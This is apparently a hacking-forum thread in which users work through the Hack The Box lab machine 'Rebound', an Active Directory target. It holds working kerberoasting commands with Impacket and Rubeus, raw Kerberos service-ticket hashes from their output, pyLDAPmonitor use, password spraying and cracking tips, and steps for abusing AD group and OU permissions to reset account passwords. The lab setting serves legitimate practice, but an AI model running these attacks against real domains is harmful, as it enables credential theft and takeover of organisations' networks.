Posts: 17
Threads: 1
Joined: Aug 2023
(Sep 10, 2023, 10:00 AM)Whatever911 Wrote: Couldn't find anything that works when trying a few worldlists with crackmapexec.. 
How did you find the hashes, btw? I mean, for the jjones user?
You can find ldap_monitor password with rockyou
Posts: 5
Threads: 1
Joined: Aug 2023
HerVelizy Wrote:Whatever911 Wrote:Couldn't find anything that works when trying a few worldlists with crackmapexec..
How did you find the hashes, btw? I mean, for the jjones user?
You can find ldap_monitor password with rockyou
Where did you found the hash for ldap_monitor?
Posts: 20
Threads: 0
Joined: Jul 2023
(Sep 10, 2023, 04:41 PM)pollero Wrote: (Sep 10, 2023, 02:24 PM)0x410x420x41 Wrote: (Sep 10, 2023, 01:08 PM)lucius222 Wrote: we could be able to kerberoast, but it's not working for me
https://www.thehacker.recipes/ad/movemen...entication
Yea but you need a list of valid SPNs... i've tried with the most generic ones without success
Edit: i was able to get a SPN but i am still not sure how viable is it..
```
root@3818efcacdb8:~/impacket/examples# python GetUserSPNs.py -no-preauth "jjones" -usersfile "services.txt" -dc-host 10.129.108.163 rebound.htb/ -request
Impacket v0.10.1.dev1+20221010.112219.ea8f2efe - Copyright 2022 SecureAuth Corporation
[-] Principal: cifs/dc01.rebound.htb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: cifs/dc01 - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: srv01 - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm/dc01 - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm/dc01.rebound.htb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$ldap/dc01$REBOUND.HTB$*ldap/dc01*$52f711156a4f409ddcd49b60$8b779ba2cb96e084dde5bd121a47b116362e8031ccfa05aeb39038d0c84b1cc1184436e9999d0d85f4f090868ace36b95abced9512cc546685d2bc101a984232c19a8f9ff45d52df09eecb02ddc6e69f02164f1f2159e101b0e6625d2caacdca38aae2e4bfc9cbea26202e07dac0a2c973dd3d4bbce128504ab862f4edcadea4f96cd961a0d7bc828d46a54120dbe954aec3a2fb542ed0abaf5195c4af1f434ad2b1281714ca56a8576606fde8926aa366b43039e432a0d143de322b9b02dbb003991bf8c60d5c3c93cbff77fe1a857a2f1d0f385359c2d517ab2dc3365fe0b7718a8dbdc0fd04875c747cd010e2a95031f2701b240cf9effa65df40da4be50fad962cb2ac7e3cdfa7b3f42e82c7a5f650c3426f2ff403113012ee35a416b80193cb932a404ffbce1e1a84556337d5acbd757f876f714a500f799ae00ff9e5d40d50f5fec803d1fd004cd0c0f2f0e08d47be02b2f933c9bb58d39e1979db522424cadc7d6e63aa9d9c669ef849eab12d79d6f813ec1f0f2fe6d4c5601330d9af401c314b860976df040f621f9420afbb07042997ee5bac748b2c63b85e35cd3f05bfba779014fe71644a9db4e1ede63b164272ef2203a9e5ebee835953f4ead3aa4f27e10b9dac6395c323435ac9ca56a99794f9b4e7a37e2fb1263ecb2e4b0c82f3901a13647678f127f28ae0cf8393d7bf81fcb24b59f8ce30a6d6d1139a21ccc61d8df75de99652fbdc56616a62685d4ba20a490a0817b3ec32ada763dc7184a725056783f2ab857a82e739bc669e681d8b42ae5a86dbb1d85bbfc13b9d6f9e680511f3b1ba44fe5954f2c0ca03441d4623bf9e4f5fbb104d3bbfcd6adad4e0b0c77d99b3a047c23d1b9345039027205eff730a75a146c560639cc3e25f6fc74840c1a8f98f0dd4ce075a93df3c881529624f9dd6ca5776d218af8fafe996d6a6502d940e49a6f5ef36f1b6d76bdb79cf6d5a24d6173d6ebddf872c79a307e43d3f69faaf1383ac973443e8b61aea70310a1e9769dbed10a95838d249e1a3e33eb454ee8455f3604278def8746a91deb648a21b146a04e3b1ba63b439d9d623bfec7e792543fb7d999427129f763c2d3bda3debc40b8fab97fbd01885a3fc82ca0e4af9a0657d1a19bdc1a06c601494c303d59affc547b10d666f7ae2fb9a5bfa8d4f93b413e5bf1b89565385bce0e39b8c6539522f06305093cae7ac8210e0971f98e4fd3a2e13caec811b904a82258f1700cf4f6f5ca90ed80f3f7d6ff4672a599bf592d4c0dbff3d8d9ca2a9201417a462f5e1bd1f97abded9cec850485a0c6121f1a66a3d2626305311b26115eabe9703ff6dd141a72f7f885ae0e45dc33210a79fda5f8ab7d2
$krb5tgs$18$ldap/dc01.rebound.htb$REBOUND.HTB$*ldap/dc01.rebound.htb*$4cbf811cb806b7a32e17afbe$089ec0e576e629bf76f1c0827da459033b245ecd012040121b3cf425ba2bf351cd4558b6280f707b1248bb9f0762b90e264be8271fab4b53578dfbc8df3ce19f8e4dd0e9e77bec4bccbd83edd999d0ff710d9a22a3c42df4914d1878a1514c27440ab1c486fe823a29ddb58017d2b9d1e7b771e696d51ea1de3f0c1dfc0660f9befd2652ad362906996846d012e50a333a6025688590e6ea6aedf516cba9f9f10f314e01bad69699badd59e96c0c15735de88592604e789d67e23254ad2f9fcf7e34e79cf0efdc68c72767a6cddb5aaf6b2620292b1b636ebe8fa94428b876647e92479c2a9b0cf14336d5d7dd82460ff15f0b0f1c36969f699c126678d983d835daac7d901d0fa2ca0ce75b84181f1d881af45517f294127db898e0fcd4666695514a41afc79d8550d702282bbe09b927dafab38403d8bd0820a083f5bb78686781e29dbed859cdad85d117bd0b9d1c9203ac211ac3832fdfb9043f2ff57a06f0348b33953c033dc183bf1eca7e287641ef32a3f783c99c3a499d49d2aa3c80021d444915e12fdbdbf5a96bf0808533c919c99c9fb53240a24594dd44e47d7cf5407864516c9d380a96976a2258b2d6a88fddd0feb8b0846dfd6713b4778605f8bbaad660b338b4a79535c8ff2f57fe7854f8b2495a160fd77eab09d12fd722a9b0d628e6268ea627d6c0467f6a151a2d1bd2f4e4db3a92b9ff69153ccbe80d700d2779766546e27e2ee5d93228c74bc2000fb00be7151cee782cab3381f1fc9e3fa50ab51e65d1f7ef699cba79dda4b76b7edd08c28a005e926951414acb3f404d40d30a1376c695ea0c998c4001ed48b733e285b86ab17bfd5d4f22e62e865cf8577fcbf967ec82536c37a7145b73b69de456af9783942f1f61ad412cdadfe6359b57c227f87710cfe4dbc019f19a54a5c3b875b3e5b3277dba84f33e869eb17217fe86e08ef704790ae57511b689eff8e8b5b07ddc102dd490ab0699ec76d9bbf14da0a028a83669eeffdb93e3bf547d4ded6b2d92170eb27608520113e66696d9dd982c3fd2e2bd0a9cee421f8e8500a90f21fa4a50b1b488ad19090e6755258a9fa439da5008ec4ca28a973e70d915099ed1eaf278bd428d651e9852e46df76ed71e8755645c7c604c3e03e7dc8b49a40efd43f21f3fe19f0674687e1da20a4d686f1857b42dbda35e63846783faf1b6cdb6783b94d41e7b62be5105a82383979c34669f8bd1fd47c992b9215cf9623d99268c42431708e4893634a4dee1e2c27c39e54e3c0ca1bd1f649c6bc5efe83ae4a6ff3ed4b70b6446e691a60a3dc0e11ed86ea9d8cdfcd121838208b963e7fc508c5c66493330f861e0914aca6b391325a8801e292457
``` Where do you get that impacket version?
I have this error:
GetUserSPNs.py: error: unrecognized arguments: -no-preauth rebound.htb/
Idem
GetUserSPNs.py: error: unrecognized arguments: -no-preauth rebound.htb/
Posts: 17
Threads: 1
Joined: Aug 2023
(Sep 10, 2023, 03:30 PM)WurumDurum Wrote: HerVelizy Wrote:Whatever911 Wrote:Couldn't find anything that works when trying a few worldlists with crackmapexec..
How did you find the hashes, btw? I mean, for the jjones user?
You can find ldap_monitor password with rockyou
Where did you found the hash for ldap_monitor?
wine ./Rubeus.exe kerberoast /nopreauth:jjones /domain:rebound.htb /dc:dc01.rebound.htb /spns:/home/vagrant/ctf/HTB/Rebound/users.txt /nowrap
Posts: 7
Threads: 0
Joined: Aug 2023
has someone managed to use ldap_monitor somehow? it seems we can't login via ldap with it
Posts: 17
Threads: 1
Joined: Aug 2023
(Sep 10, 2023, 05:53 PM)lucius222 Wrote: has someone managed to use ldap_monitor somehow? it seems we can't login via ldap with it
I do but didn't find anything interesting. Just that some passwords are regularly changed.
python3 pyLDAPmonitor.py -d rebound.htb -u ldap_monitor -p '<PASS>' --use-ldaps --dc-ip 10.129.xx.xx -k
Posts: 7
Threads: 0
Joined: Aug 2023
(Sep 10, 2023, 06:10 PM)HerVelizy Wrote: (Sep 10, 2023, 05:53 PM)lucius222 Wrote: has someone managed to use ldap_monitor somehow? it seems we can't login via ldap with it
I do but didn't find anything interesting. Just that some passwords are regularly changed.
python3 pyLDAPmonitor.py -d rebound.htb -u ldap_monitor -p '<PASS>' --use-ldaps --dc-ip 10.129.xx.xx -k
i'm getting auth errors with this, wtf
can you use crackmapexec ldap with ldap_monitor pass?
Posts: 7
Threads: 0
Joined: Aug 2023
(Sep 10, 2023, 07:20 PM)Whatever911 Wrote: (Sep 10, 2023, 06:40 PM)lucius222 Wrote: (Sep 10, 2023, 06:10 PM)HerVelizy Wrote: (Sep 10, 2023, 05:53 PM)lucius222 Wrote: has someone managed to use ldap_monitor somehow? it seems we can't login via ldap with it
I do but didn't find anything interesting. Just that some passwords are regularly changed.
python3 pyLDAPmonitor.py -d rebound.htb -u ldap_monitor -p '<PASS>' --use-ldaps --dc-ip 10.129.xx.xx -k
i'm getting auth errors with this, wtf
can you use crackmapexec ldap with ldap_monitor pass? Did you install all requirements for LDAPmonitor? Does your command work?
└─$ sudo apt-get install build-essential python-dev-is-python3 python3-dev python2.7-dev libldap2-dev libsasl2-dev slapd ldap-utils tox lcov valgrind
└─$ pip install python-ldap
when i run it with -k i'm getting
ldap3.core.exceptions.LDAPSocketOpenError: invalid server address
without -k
ldap3.core.exceptions.LDAPBindError: automatic bind not successful - invalidCredentials
Also: i tried a password spray and i got another user, but still can't access anything
Posts: 4
Threads: 0
Joined: Sep 2023
Sep 11, 2023, 12:02 AM
(This post was last modified: Sep 11, 2023, 12:05 AM by zer0.)
(Sep 10, 2023, 10:20 PM)Whatever911 Wrote: Well yes, you need to find that users' hash and crack it, then use its credentials.
But the question remains, what after that? How to proceed towards foothold?
1. Check which user has permissions on a group called ServiceMgmt
Example
2. Abuse that permissions.
Example
2. Check which permissions that group has on another domain object (OU)
3. Abuse permissions on said object to reset the password of some account that can access the server.
4. Foothold secured.
Maybe use a windows vm for those tasks. Powersploit, Powerview are nice to have.
Posts: 10
Threads: 0
Joined: Sep 2023
(Sep 11, 2023, 12:02 AM)zer0 Wrote: (Sep 10, 2023, 10:20 PM)Whatever911 Wrote: Well yes, you need to find that users' hash and crack it, then use its credentials.
But the question remains, what after that? How to proceed towards foothold?
1. Check which user has permissions on a group called ServiceMgmt
Example
2. Check which permissions that group has on another domain object (OU)
3. Abuse permissions on said object to reset the password of some account that can access the server.
4. Foothold secured.
Maybe use a windows vm for those tasks. Powersploit, Powerview are nice to have.
are the hashese crackable? i've tried the ones retrieved with asreproasting and no success so far
|
